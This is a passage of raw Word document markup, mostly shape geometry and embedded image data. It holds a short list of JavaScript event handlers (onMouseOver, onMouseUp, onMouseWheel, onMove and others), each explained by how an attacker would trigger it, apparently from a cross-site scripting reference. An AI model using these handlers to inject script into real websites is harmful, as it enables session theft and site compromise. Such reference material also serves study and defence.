                <v:shape id="Text Box 978" o:spid="_x0000_s1457" type="#_x0000_t202" style="position:absolute;left:1930;top:18;width:108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B3p8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6keulmNpcgEYTBWu8OOz+bZ&#10;hjYvXRO1+++Xw2DHj+/3Np9sL240euNYwXKRgCCunTbcKPisDk8vIHxA1tg7JgU/5CHfzR62mGl3&#10;55Jup9CIGMI+QwVtCEMmpa9bsugXbiCO3MWNFkOEYyP1iPcYbnu5SpJUWjQcG1ocaN9S3Z2uVkHx&#10;xeWr+X4/f5SX0lTVOuG3tFPqcT4VGxCBpvAv/nMftYL1c1wbz8Q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B3p8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onMouseOut()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0316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227330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="973" name="Group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6205"/>
                          <a:chOff x="1930" y="358"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="974" name="Freeform 976"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="358"/>
                            <a:ext cx="1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 541 358"/>
                              <a:gd name="T3" fmla="*/ 541 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 541 358"/>
                              <a:gd name="T7" fmla="*/ 541 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 540 358"/>
                              <a:gd name="T11" fmla="*/ 540 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 520 358"/>
                              <a:gd name="T15" fmla="*/ 520 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 516 358"/>
                              <a:gd name="T19" fmla="*/ 516 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 379 358"/>
                              <a:gd name="T23" fmla="*/ 379 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 358 358"/>
                              <a:gd name="T27" fmla="*/ 358 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 358 358"/>
                              <a:gd name="T31" fmla="*/ 358 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 379 358"/>
                              <a:gd name="T35" fmla="*/ 379 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 520 358"/>
                              <a:gd name="T39" fmla="*/ 520 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 540 358"/>
                              <a:gd name="T43" fmla="*/ 540 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 541 358"/>
                              <a:gd name="T47" fmla="*/ 54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67" h="183">
                                <a:moveTo>
                                  <a:pt x="1146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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1146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Text Box 97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58"/>
                            <a:ext cx="11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onMouseOver()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74" o:spid="_x0000_s1458" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:17.9pt;width:58.35pt;height:9.15pt;z-index:-17613312;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,358" coordsize="116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">
                <v:shape id="Freeform 976" o:spid="_x0000_s1459" style="position:absolute;left:1930;top:358;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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JPMsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74X+g9hCL6WRU0LTuFFCEygYSg9O8gGL&#10;tbFNrJWRZFv5+yoQ6HGYmTfMehtNJ0ZyvrWsYD7LQBBXVrdcKzgdv18/QPiArLGzTAqu5GG7eXxY&#10;Y67txCWNh1CLBGGfo4ImhD6X0lcNGfQz2xMn72ydwZCkq6V2OCW46eRblr1Lgy2nhQZ72jdUXQ6D&#10;UfC738UCfybnYzEOi+HlVMrrRannp/j1CSJQDP/he7vQClbLBdzOpCM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Ik8yxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1146,183l21,183r-3,-1l,162r,-4l,21,21,,1146,r21,21l1167,162r-18,20l1146,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,541;21,541;18,540;0,520;0,516;0,379;21,358;1146,358;1167,379;1167,520;1149,540;1146,541" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 975" o:spid="_x0000_s1460" type="#_x0000_t202" style="position:absolute;left:1930;top:358;width:116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HYOcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxUKupq4goFAQxpoceX7PP&#10;ZDH7Ns1uNf57Vyh4HGbmG2a+7GwtLtR641jBeJSAIC6cNlwq+Mq3wykIH5A11o5JwY08LBf93hxT&#10;7a6c0eUYShEh7FNUUIXQpFL6oiKLfuQa4uidXGsxRNmWUrd4jXBby9ckmUiLhuNChQ2tKyrOxz+r&#10;YPXN2cb87n8O2SkzeT5LeDc5K/Uy6FYfIAJ14Rn+b39qBbP3N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dg5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onMouseOver()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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mouse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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image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table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off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>again)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(cursor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>moves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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area)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="13"/>
        <w:ind w:left="19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05952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12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="970" name="Group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19"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="971" name="Freeform 973"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="19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201 19"/>
                              <a:gd name="T3" fmla="*/ 201 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 201 19"/>
                              <a:gd name="T7" fmla="*/ 201 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 201 19"/>
                              <a:gd name="T11" fmla="*/ 201 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 180 19"/>
                              <a:gd name="T15" fmla="*/ 180 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 177 19"/>
                              <a:gd name="T19" fmla="*/ 177 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 40 19"/>
                              <a:gd name="T23" fmla="*/ 40 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 19 19"/>
                              <a:gd name="T27" fmla="*/ 19 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 19 19"/>
                              <a:gd name="T31" fmla="*/ 19 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 40 19"/>
                              <a:gd name="T35" fmla="*/ 40 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 180 19"/>
                              <a:gd name="T39" fmla="*/ 180 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 201 19"/>
                              <a:gd name="T43" fmla="*/ 201 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 201 19"/>
                              <a:gd name="T47" fmla="*/ 20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Text Box 97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9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onMouseUp()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71" o:spid="_x0000_s1461" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.95pt;width:49.85pt;height:9.15pt;z-index:15805952;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,19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">
                <v:shape id="Freeform 973" o:spid="_x0000_s1462" style="position:absolute;left:1930;top:19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+gZ8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJXkQ3sdBqdBVRhB6qYKr3Z/aZ&#10;BLNv0+xG03/vFoQeh5n5hpkvO1OJGzWutKwgHkUgiDOrS84VHL+3wwkI55E1VpZJwS85WC5eX+aY&#10;aHvnA91Sn4sAYZeggsL7OpHSZQUZdCNbEwfvYhuDPsgml7rBe4CbSo6j6F0aLDksFFjTuqDsmrZG&#10;we5nKjeb6roa7L8urWvPp/ObjpXq97rVDISnzv+Hn+1PrWD6EcPfmXA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L6BnxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,201;21,201;18,201;0,180;0,177;0,40;21,19;976,19;997,40;997,180;979,201;976,201" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 972" o:spid="_x0000_s1463" type="#_x0000_t202" style="position:absolute;left:1930;top:19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hATc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en7BP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WEBN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onMouseUp()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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image)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="443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06464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795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="967" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="968" name="Freeform 970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1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 96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1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onMouseWheel()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68" o:spid="_x0000_s1464" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:62.6pt;height:9.15pt;z-index:15806464;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="125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">
                <v:shape id="Freeform 970" o:spid="_x0000_s1465" style="position:absolute;left:1930;top:154;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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80iMEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy2rCQBTdC/7DcAvd6cQWgk0dpQpCshK17m8z1yRt&#10;5k7MTPP4e2chuDyc92ozmFp01LrKsoLFPAJBnFtdcaHg+7yfLUE4j6yxtkwKRnKwWU8nK0y07flI&#10;3ckXIoSwS1BB6X2TSOnykgy6uW2IA3e1rUEfYFtI3WIfwk0t36IolgYrDg0lNrQrKf87/RsF7/Fw&#10;cXt9PVx+snSstiZb3H4zpV5fhq9PEJ4G/xQ/3KlW8BGHteFMO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PNIjBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,336;21,336;18,336;0,315;0,312;0,175;21,154;1231,154;1252,175;1252,315;1234,336;1231,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 969" o:spid="_x0000_s1466" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:125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VE4cUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVeqsbewhN6kZELAiFYowHj6/Z&#10;l2Qx+zZmV03/vVso9DjMzDfMYjnZXlxp9MaxgvksAUFcO224VXCoPl7eQPiArLF3TAp+yMOyeHxY&#10;YK7djUu67kMrIoR9jgq6EIZcSl93ZNHP3EAcvcaNFkOUYyv1iLcIt718TZJUWjQcFzocaN1Rfdpf&#10;rILVkcuNOX9978qmNFWVJfyZnpR6fppW7yACTeE//NfeagVZmsHvmXgEZH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JUTh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onMouseWheel()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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mouse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>wheel)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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="420" w:space="40"/>
            <w:col w:w="709" w:space="146"/>
            <w:col w:w="7705"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:spacing w:before="72"/>
        <w:ind w:left="1252" w:hanging="1063"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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48570777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49530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="964" name="Group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78"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="965" name="Freeform 967"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="78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260 78"/>
                              <a:gd name="T3" fmla="*/ 260 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 260 78"/>
                              <a:gd name="T7" fmla="*/ 260 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 260 78"/>
                              <a:gd name="T11" fmla="*/ 260 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 239 78"/>
                              <a:gd name="T15" fmla="*/ 239 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 236 78"/>
                              <a:gd name="T19" fmla="*/ 236 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 99 78"/>
                              <a:gd name="T23" fmla="*/ 99 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 78 78"/>
                              <a:gd name="T27" fmla="*/ 78 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 78 78"/>
                              <a:gd name="T31" fmla="*/ 78 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 99 78"/>
                              <a:gd name="T35" fmla="*/ 99 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 239 78"/>
                              <a:gd name="T39" fmla="*/ 239 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 260 78"/>
                              <a:gd name="T43" fmla="*/ 260 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 260 78"/>
                              <a:gd name="T47" fmla="*/ 26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Text Box 96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78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onMove()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65" o:spid="_x0000_s1467" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:3.9pt;width:37.1pt;height:9.15pt;z-index:-17608704;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,78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">
                <v:shape id="Freeform 967" o:spid="_x0000_s1468" style="position:absolute;left:1930;top:78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ZxKcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE34X+w3KFvkjdtaDU1E0ogjSWgDT6AZfs&#10;NQlm74bsNqZ/3y0U+jjMzBlml022EyMNvnWsYbVUIIgrZ1quNVzOh6cXED4gG+wck4Zv8pClD7Md&#10;Jsbd+ZPGMtQiQtgnqKEJoU+k9FVDFv3S9cTRu7rBYohyqKUZ8B7htpPPSm2kxZbjQoM97RuqbuWX&#10;1fB+LDo/XTC3Z9yuPk43VYwLpfXjfHp7BRFoCv/hv3ZuNGw3a/g9E4+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5nEpxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,260;21,260;18,260;0,239;0,236;0,99;21,78;720,78;741,99;741,239;723,260;720,260" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 966" o:spid="_x0000_s1469" type="#_x0000_t202" style="position:absolute;left:1930;top:78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rQk8QA&#10;AADc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ME9T+D0Tj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60JP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onMove()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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>move</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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page)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:hanging="1316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0828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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="961" name="Group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167"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="962" name="Freeform 964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349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
